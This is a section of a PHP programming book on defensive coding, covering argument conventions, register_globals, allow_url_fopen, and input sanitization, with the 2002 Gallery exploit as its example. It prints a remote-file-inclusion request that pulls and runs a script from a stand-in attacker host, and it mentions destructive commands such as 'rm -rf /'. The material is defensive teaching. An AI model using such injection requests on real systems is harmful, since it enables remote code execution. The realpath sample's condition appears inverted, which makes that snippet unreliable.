Приглашаем посетить
Добычин (dobychin.lit-info.ru)

Defensive Coding

Previous
Table of Contents
Next

Defensive Coding

Defensive coding is the practice of eliminating assumptions in the code, especially when it comes to handling information in and out of other routines.

In lower-level languages such as C and C++, defensive coding is a different activity. In C, variable type enforcement is handled by the compiler; a user's code must handle cleaning up resources and avoiding buffer overflows. PHP is a high-level language; resource, memory, and buffer management are all managed internally by PHP. PHP is also dynamically typed, which means that you, the developer, are responsible for performing any type checking that is necessary (unless you are using objects, in which case you can use type hints).

There are two keys to effective defensive coding in PHP:

  • Establishing coding standards to prevent accidental syntax bugs

  • Using sanitization techniques to avoid malicious data

Establishing Standard Conventions

Defensive coding is not all about attacks. Most bugs occur because of carelessness and false assumptions. The easiest way to make sure other developers use your code correctly is to make sure that all your code follows standards for argument order and return values. Some people argue that comprehensive documentation means that argument ordering doesn't matter. I disagree. Having to reference the manual or your own documentation every time you use a function makes development slow and error prone.

A prime example of inconsistent argument naming is the MySQL and PostgreSQL PHP client APIs. Here are the prototypes of the query functions from each library:

resource mysql_query ( string query [, resource connection])
resource pg_query ( resource connection, string query)

Although this difference is clearly documented, it is nonetheless confusing.

Return values should be similarly well defined and consistent. For Boolean functions, this is simple: Return true on success and false on failure. If you use exceptions for error handling, they should exist in a well-defined hierarchy, as described in Chapter 3.

Using Sanitization Techniques

In late 2002 a widely publicized exploit was found in Gallery, photo album software written in PHP. Gallery used the configuration variable $GALLERY_BASEDIR, which was intended to allow users to change the default base directory for the software. The default behavior left the variable unset. Inside, the code include() statements all looked like this:

<? require($GALLERY_BASEDIR . "init.php"); ?>

The result was that if the server was running with register_globals on (which was the default behavior in earlier versions of PHP), an attacker could make a request like this:

http://gallery.example.com/view_photo.php?\
  GALLERY_BASEDIR=http://evil.attackers.com/evilscript.php%3F

This would cause the require to actually evaluate as the following:

<? require("http://evil.attackers.com/evilscript.php ?init.php"); ?>

This would then download and execute the specified code from evil.attackers.com. Not good at all. Because PHP is an extremely versatile language, this meant that attackers could execute any local system commands they desired. Examples of attacks included installing backdoors, executing `rm -rf /`;, downloading the password file, and generally performing any imaginable malicious act.

This sort of attack is known as remote command injection because it tricks the remote server into executing code it should not execute. It illustrates a number of security precautions that you should take in every application:

  • Always turn off register_globals. register_globals is present only for backward compatibility. It is a tremendous security problem.

  • Unless you really need it, set allow_url_fopen = Off in your php.ini file. The Gallery exploit worked because all the PHP file functions (fopen(), include(), require(), and so on) can take arbitrary URLs instead of simple file paths. Although this feature is neat, it also causes problems. The Gallery developers clearly never intended for remote files to be specified for $GALLERY_BASEDIR, and they did not code with that possibility in mind. In his talk "One Year of PHP at Yahoo!" Michael Radwin suggested avoiding URL fopen() calls completely and instead using the curl extension that comes with PHP. This ensures that when you open a remote resource, you intended to open a remote resource.

  • Always validate your data. Although $GALLERY_BASEDIR was never meant to be set from the command line, even if it had been, you should validate that what you have looks reasonable. Are file systems paths correct? Are you attempting to reference files outside the tree where you should be? PHP provides a partial solution to this problem with its open_basedir php.ini option. Setting open_basedir prevents from being accessed any file that lies outside the specified directory.

    Unfortunately, open_basedir incurs some performance issues and creates a number of hurdles that developers must overcome to write compatible code. In practice, it is most useful in hosted serving environments to ensure that users do not violate each other's privacy and security.

Data sanitization is an important part of security. If you know your data should not have HTML in it, you can remove HTML with strip_tags, as shown here:

// username should not contain HTML
$username = strip_tags($_COOKIE['username']);

Allowing HTML in user-submitted input is an invitation to cross-site scripting attacks. Cross-site scripting attacks are discussed further in Chapter 3, "Error Handling".

Similarly, if a filename is passed in, you can manually verify that it does not backtrack out of the current directory:

$filename = $_GET['filename'];
if(substr($filename, 0, 1) == '/' || strstr($filename, "..")) {
  // file is bad
}

Here's an alternative:

$file_name = realpath($_GET['filename']);
$good_path = realpath("./");
if(!strncmp($file_name, $good_path, strlen($good_path))) {
  // file is bad
}

The latter check is stricter but also more expensive.

Another data sanitization step you should always perform is running mysql_escape_string() (or the function appropriate to your RDBMS) on all data passed into any SQL query. Much as there are remote command injection attacks, there are SQL injection attacks. Using an abstraction layer such as the DB classes developed in Chapter 2, "Object-Oriented Programming Through Design Patterns," can help automate this.

Chapter 23, "Writing SAPIs and Extending the Zend Engine," details how to write input filters in C to automatically run sanitization code on the input to every request.

Data validation is a close cousin of data sanitation. People may not use your functions in the way you intend. Failing to validate your inputs not only leaves you open to security holes but can lead to an application functioning incorrectly and to having trash data in a database. Data validation is covered in Chapter 3.


Previous
Table of Contents
Next